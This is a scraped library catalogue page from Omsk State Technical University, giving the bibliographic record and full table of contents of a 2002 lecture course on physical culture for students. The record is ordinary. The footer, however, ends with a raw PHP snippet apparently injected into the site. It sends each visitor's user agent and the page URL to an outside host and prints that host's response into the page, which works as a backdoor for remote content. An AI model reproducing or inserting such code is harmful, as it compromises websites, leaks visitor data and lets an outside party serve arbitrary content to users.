Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

134 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=FBB3FADA-3430-E670-DFC0-25DB2258D1C1$")И(("Ключевые слова=ИЗМЕНЕНИЯ"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
FBB3FADA-3430-E670-DFC0-25DB2258D1C1
FBB3FADA-3430-E670-DFC0-25DB2258D1C1
ББК 75/Ф50
Физическая культура [Текст] : курс лекций / Ж. Б. Сафонова, В. М. Шулятьев, В. Ф. Красавина и др.; под ред. Ж. Б. Сафоновой ; ОмГТУ. - Омск : Изд-во ОмГТУ, 2002. - 154 с. : табл. - Библиогр. в конце гл. - 200 экз. - 56.76 р.
Содержание:
Тема 1. Физическая культура в общекультурной и профессиональной подготовке студентов. - С. 5
1.1. Физическая культура и спорт - составляющие общей культуры общества. - С. 5
1.2. Ценности физической культуры. - С. 7
1.2.1. Социальные функции физической культуры и спорта. - С. 9
1.3. Основные положения организации физического воспитания в вузе. - С. 10
1.3.1. Формы физического воспитания студентов. - С. 11
1.3.2. Задачи и организация физического воспитания в высшем учебном заведении. - С. 11
1.3.3. Основные понятия системы физического воспитания. - С. 12
1.4. Роль физической культуры и спорта в подготовке студентов к профессиональной деятельности и экстремальным жизненным ситуациям. - С. 14
1.5. Программное построение курса физического воспитания. - С. 16
Тема 2. Социально-биологические основы физической культуры. - С. 18
2.1. Организм человека как единая саморазвивающаяся и саморегулирующаяся система. - С. 18
2.2. Внешняя среда - природные и социально-экологические факторы (их влияние на организм и жизнедеятельность) . - С. 24
2.3. Биологические ритмы и работоспособность. - С. 28
2.4. Гипокинезия и гиподинамия, их неблагоприятное влияние на организм. - С. 29
2.5. Средства физической культуры в совершенствовании организма, обеспечении его устойчивости к физической и умственной деятельности . - С. 30
2.5.1. Физиологические механизмы и закономерности совершенствования отдельных систем организма под воздействием направленной физической тренировки. - С. 31
2.6. Двигательная функция и повышение уровня адаптации и устойчивости организма человека к различным условиям. - С. 32
Тема 3. Основы здорового образа жизни студента. Физическая культура и обеспечение здоровья. - С. 34
1. Понятие "Здоровье, его содержание и критерии. - С. 34
3.2. Функциональные возможности проявления здоровья человека в различных сферах жизнедеятельности. - С. 35
3.3. Влияние образа жизни на здоровье. - С. 36
3.3.1. Факторы риска и здоровье. - С. 37
3.4. Направленность поведения человека на обеспечение своего здоровья. - С. 40
3.4.1. Адекватное и неадекватное отношение к здоровью, его самооценка студентами. - С. 41
3.4.2. Индивидуально-психологические особенности личности. - С. 42
3.5. Содержательные особенности составляющих здорового образа жизни: режим труда и отдыха. личная гигиена. - С. 45
3.5.1. Режим труда и отдыха. - С. 45
3.5.2. Сон и профилактика его нарушений. - С. 46
3.5.3. Личная гигиена и закаливание. - С. 48
3.5.4. Культура сексуального поведения. - С. 49
Тема 4. Психофизиологические основы учебного труда и интеллектуальной деятельности. Средства физической культуры в регулировании работоспособности. - С. 51
4.1. Объективные и субъективные факторы обучения и реакция на них организма студентов. - С. 51
4.2. Типичные особенности жизнедеятельности студентов в период экзаменов. - С. 52
4.3. Влияние на работоспособность периодических ритмических процессов в организме. - С. 54
4.4. Работоспособность и общие закономерности изменения ее у студентов. - С. 56
4.5. Объективные и субъективные признаки усталости, утомления и переутомления, их причины и профилактика. - С. 57
4.6. Особенности рационального использования малых форм физической культуры в режиме учебного труда студентов. - С. 60
4.7. Роль оздоровительно-спортивного лагеря в оптимизации условий жизнедеятельности студентов. - С. 61
4.8. Средства физической культуры в регулировании психоэмоционального и функционального состояния студентов. - С. 61
4.8.1. Понятие о релаксации и аутотренинге. - С. 61
4.8.2. Оперативная тонизация. - С. 62
Тема 5. Общая физическая и спортивная подготовка в системе физического воспитания. - С. 63
5.1. Методические принципы физического воспитания. - С. 63
5.1.1. Принцип сознательности и активности. - С. 64
5.1.2. Принцип наглядности. - С. 65
5.1.3. Принцип доступности и индивидуализации. - С. 66
5.1.4. Принцип систематичности. - С. 67
5.1.5. Принцип постепенного повышения требований (динамичности). - С. 68
5.2. Методы физического воспитания. - С. 69
5.2.1. Метод строго регламентированного упражнения. - С. 70
5.2.2. Игровой и соревновательный методы . - С. 70
5.3. Использование словесного и сенсорного методов. - С. 71
5.4. Основы обучения движениям. - С. 72
5.5. Средства и методы воспитания физических качеств. - С. 73
5.5.1. Воспитание силы. - С. 74
5.5.2. Воспитание быстроты движений (скорости). - С. 75
5.5.3. Воспитание ловкости (координации движений). - С. 76
5.5.4. Воспитание гибкости. - С. 77
5.5.5. Воспитание выносливости. - С. 77
Тема 6. Основы методики самостоятельных занятий физическими упражнениями. - С. 79
6.1. Оптимальная двигательная активность и ее воздействие на организм, здоровье и работоспособность. - С. 79
6.2. Формирование мотивов и организация самостоятельных занятий физическими упражнениями. - С. 81
6.2.1. Определение цели и учета индивидуальных особенностей. - С. 81
6.2.2. Управление процессом самостоятельных занятий. - С. 82
6.3. Формы и содержание самостоятельных занятий физическими упражнениями. - С. 83
6.3.1. Планирование объема и интенсивности физических упражнений с учетом умственной учебной деятельности. - С. 86
6.4. Возрастные особенности самостоятельных занятий для женщин. - С. 87
6.5. Гигиена самостоятельных занятий: уход за кожей, питьевой режим, питание . - С. 88
6.6. Самоконтроль за эффективностью самостоятельных занятий. - С. 90
Тема 7. Индивидуальный выбор видов спорта или системы физических упражнений. - С. 91
7.1. Определение понятия "спорт". Его принципиальное отличие от других видов занятий физическими упражнениями. - С. 91
7.2. Массовый спорт. Спорт высших достижений. - С. 92
7.3. Спортивная классификация. - С. 93
7.4. Национальные виды спорта. - С. 94
7.5. Студенческий спорт. - С. 95
7.6. Специальные зачетные требования и нормативы. Спорт в свободное время. - С. 96
7.7. Спортивные соревнования. - С. 96
7.8. Нетрадиционные виды спорта. - С. 98
7.9. Мотивы индивидуального выбора студентом конкретного вида спорта. - С. 98
7.10. Характеристика основных групп видов спорта, развивающих определенные физические качества. - С. 100
Тема 8. Особенности занятий избранным видом спорта (системой физических упражнений). - С. 101
8.1. Краткая историческая справка о виде спорта. - С. 101
8.1.1. Волейбол. - С. 101
8.1.2. Баскетбол. - С. 101
8.1.3. Футбол. - С. 102
8.1.4. Плавание. - С. 103
8.1.3. Лыжный спорт. - С. 103
8.1.6. Легкая атлетика. - С. 103
8.1.7. Борьба. - С. 104
8.2. Влияние различных видов спорта на физическое развитие, функциональную подготовленность, психические качества и свойства личности. - С. 105
8.3. Определение целей и задач спортивной подготовленности. Перспективное и текущее планирование. - С. 107
8.4. Основные пути достижения необходимой структуры подготовленности: физической, технической, тактической и психической. - С. 108
8.5. Специальные зачетные требования и нормативы в избранном виде спорта. - С. 110
Тема 9. Врачебно-педагогические исследования и самоконтроль занимающихся физическими упражнениями и спортом. - С. 111
9.1. Врачебный контроль как условие допуска к занятиям физическими упражнениями и спортом, его содержание и периодичность. - С. 111
9.2. Методы исследований, применяемые во врачебном контроле. - С. 112
9.2.1. Антропометрические исследования. - С. 113
9.2.2. Метод стандартов. - С. 113
9.2.3. Метод корреляции. - С. 114
9.2.4. Метод номограмм. - С. 114
9.2.5. Метод индексов. - С. 114
9.3. Исследование функционального состояния организма и физической работоспособности. - С. 116
9.4. Исследование функции дыхания. - С. 119
9.5. Исследование нервной системы. - С. 120
9.6. Объективные и субъективные показатели самоконтроля. - С. 121
Тема 10. Профессионально-прикладная физическая подготовка (ППФП) студентов. - С. 123
10.1. Краткая историческая справка. - С. 123
10.2. Личная и социально-экономическая необходимость специальной физической подготовки человека к труду в современных условиях. - С. 124
10.3. Понятие ППФП, ее место в системе физического воспитания студентов . - С. 125
10.4. Основные факторы, определяющие содержание ППФП студентов. - С. 125
10.5. Дополнительные факторы, влияющие на содержание ППФП. - С. 128
10.6. Методика подбора ППФП и видов спорта. - С. 129
10.7. Организация, формы и средства ППФП в вузе. - С. 130
10.8. Особенности ППФП студентов на учебных занятиях и во внеурочное время. - С. 131
10.9. Система контроля ППФП студентов. - С. 133
Тема 11. Физическая культура в производственной деятельности бакалавра и специалиста. - С. 134
11.1. Производственная физическая культура (ПФК). Понятие "Производственная физическая культура", ее цели и задачи. - С. 134
11.2. Методические основы ПФК. - С. 135
11.2.1. Влияние условий труда и быта специалиста на выбор форм, методов и средств ПФК в рабочее и свободное время. - С. 136
11.2.2. Производственная физическая культура в рабочее время ("Производственная гимнастика"). - С. 137
11.2.3. Методика составления комплексов в различных видах производственной гимнастики и определение их места в течение рабочего дня. - С. 138
11.3. Физическая культура и спорт специалиста в свободное от работы время. - С. 139
11.3.1. Утренняя гигиеническая гимнастика (УГГ). - С. 139
11.3.2. Утренние специально направленные занятия физическими упражнениями. - С. 140
11.3.3. Попутная тренировка. - С. 140
11.3.4. Физкультурно-спортивные занятия для активного отдыха и повышения функциональных возможностей. - С. 141
11.4. Использование дополнительных средств повышения общей и профессиональной работоспособности в процессе занятий физическими упражнениями. - С. 144
11.5. Профилактика профессиональных заболеваний и травматизма средствами физической культуры. - С. 144
11.6. Влияние индивидуальных особенностей, географо-климатических факторов на содержание производственной физической культуры. - С. 146
11.7. Роль личности руководителя во внедрении физической культуры в производственный коллектив. - С. 147
ББК 75я73

Рубрики:
39 (Физическое воспитание и спорт)
Физическое воспитание и спорт
Учебники и пособия -- Очное обучение
Физическая культура и спорт -- Учебники и пособия
Спорт -- Учебники и пособия
Физическое воспитание и спорт -- Учебники и пособия

Кл.слова (ненормированные): ОМПИ -- ОМГТУ -- УЧЕБНИК И ПОСОБИЕ -- ЛЕКЦИЯ -- КУРС ЛЕКЦИЙ -- ФИЗКУЛЬТУРА -- ФИЗВОСПИТАНИЕ -- Студент -- Здоровье -- Работоспособность -- Физическая подготовка -- Спортивная подготовка -- Физическое упражнение -- Спорт -- Волейбол -- Баскетбол -- Футбол -- Плавание -- Лыжный спорт -- Легкая атлетика -- Борьба
Доп. точки доступа:
Сафонова, Жанна Борисовна
Шулятьев, Владимир Михайлович
Красавина, Валентина Федоровна
Гераськин, Анатолий Александрович
Бабушкин, Евгений Геннадьевич
Сафонова, Жанна Борисовнаред.
Омский государственный технический университет

Нет сведений об экземплярах
Держатели документа:
Научная библиотека Омского государственного технического университета : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3054 - 20.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.11 с.14 запросов, 0.89c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;